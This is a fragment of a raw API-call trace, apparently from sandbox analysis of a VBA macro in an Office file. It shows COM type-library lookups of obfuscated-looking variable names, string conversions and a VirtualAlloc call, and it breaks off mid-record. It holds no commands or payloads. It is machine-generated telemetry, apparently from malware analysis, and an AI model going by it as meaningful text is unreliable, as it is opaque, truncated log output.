CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_WQAAZGAA") returned 16 [0069.062] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.062] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WQAAZGAA", lHashVal=0x109628, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.062] IUnknown:Release (This=0x665ba50) returned 0xd [0069.062] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.062] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WQAAZGAA", lHashVal=0x109628, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.062] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.062] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.062] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WQAAZGAA", lHashVal=0x109628, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.062] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.063] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.063] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WQAAZGAA", lHashVal=0x109628, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.063] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.063] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.063] IUnknown:Release (This=0x665ba50) returned 0xd [0069.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10e2e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_WQAAZGAA") returned 16 [0069.063] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WQAAZGAA", lHashVal=0x109628, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x5a004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x5a004100000000, pDummy=0x0) returned 0x0 [0069.063] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a621c6 | out: _Dst=0x144ec0) returned 0x0 [0069.063] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nDxAoAA", lHashVal=0x1063a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a621f2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nDxAoAA") returned 8 [0069.063] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nDxAoAA", lHashVal=0x1063a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a621f2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nDxAoAA") returned 8 [0069.063] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nDxAoAA", lHashVal=0x1063a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.063] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nDxAoAA") returned 0x1063a3 [0069.063] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="nDxAoAA" | out: _Dst="nDxAoAA") returned 0x0 [0069.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="nDxAoAA") returned 8 [0069.063] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.063] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nDxAoAA", lHashVal=0x1063a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.063] IUnknown:Release (This=0x665ba50) returned 0xd [0069.063] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.063] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nDxAoAA", lHashVal=0x1063a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.063] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.063] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.063] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nDxAoAA", lHashVal=0x1063a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.064] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.064] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.064] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nDxAoAA", lHashVal=0x1063a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.064] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a621f2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nDxAoAA") returned 8 [0069.064] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nDxAoAA", lHashVal=0x1063a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.064] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.064] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a621f2 | out: _Dst=0x67c2d40) returned 0x0 [0069.064] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nDxAoAA") returned 0x106727 [0069.064] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_nDxAoAA" | out: _Dst="_B_var_nDxAoAA") returned 0x0 [0069.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_nDxAoAA") returned 15 [0069.064] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.064] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nDxAoAA", lHashVal=0x106727, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.064] IUnknown:Release (This=0x665ba50) returned 0xd [0069.064] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.064] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nDxAoAA", lHashVal=0x106727, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.064] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.064] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.064] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nDxAoAA", lHashVal=0x106727, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.064] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.064] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.064] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nDxAoAA", lHashVal=0x106727, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.064] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.064] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.064] IUnknown:Release (This=0x665ba50) returned 0xd [0069.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10e5e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_nDxAoAA") returned 15 [0069.064] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nDxAoAA", lHashVal=0x106727, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0) returned 0x0 [0069.065] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a621f2 | out: _Dst=0x144ec0) returned 0x0 [0069.065] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.065] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.065] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.065] IUnknown:Release (This=0x665ba50) returned 0xd [0069.065] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.065] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.065] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.065] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.065] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.065] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.065] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.065] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.065] IUnknown:Release (This=0x665ba50) returned 0xd [0069.065] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.065] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.065] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.065] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.065] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.066] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.066] IUnknown:Release (This=0x665ba50) returned 0xd [0069.066] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.066] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.066] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.066] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.066] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.066] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.066] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.066] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.066] IUnknown:Release (This=0x665ba50) returned 0xd [0069.066] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.066] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.066] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.066] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.066] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.066] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.066] IUnknown:Release (This=0x665ba50) returned 0xd [0069.066] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.066] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.066] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.067] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.067] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.067] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.067] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.067] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.067] IUnknown:Release (This=0x665ba50) returned 0xd [0069.067] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.067] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.067] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.067] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.067] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.067] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.067] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.067] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.067] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.067] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.067] IUnknown:Release (This=0x665ba50) returned 0xd [0069.067] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.067] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.067] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.067] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4d00000 [0069.068] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.068] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.068] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.068] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.068] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.069] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.069] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.069] IUnknown:Release (This=0x665ba50) returned 0xd [0069.069] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.069] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.069] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6214e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="nGDAXA") returned 7 [0069.069] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nGDAXA", lHashVal=0x103d2e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6214e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="nGDAXA") returned 7 [0069.069] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nGDAXA", lHashVal=0x103d2e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6214e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="nGDAXA") returned 7 [0069.069] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nGDAXA", lHashVal=0x103d2e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.069] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nGDAXA") returned 0x103d2e [0069.069] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="nGDAXA" | out: _Dst="nGDAXA") returned 0x0 [0069.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="nGDAXA") returned 7 [0069.069] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.069] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nGDAXA", lHashVal=0x103d2e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.070] IUnknown:Release (This=0x665ba50) returned 0xd [0069.070] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.070] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nGDAXA", lHashVal=0x103d2e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.070] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.070] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.070] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nGDAXA", lHashVal=0x103d2e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.070] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.070] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.070] 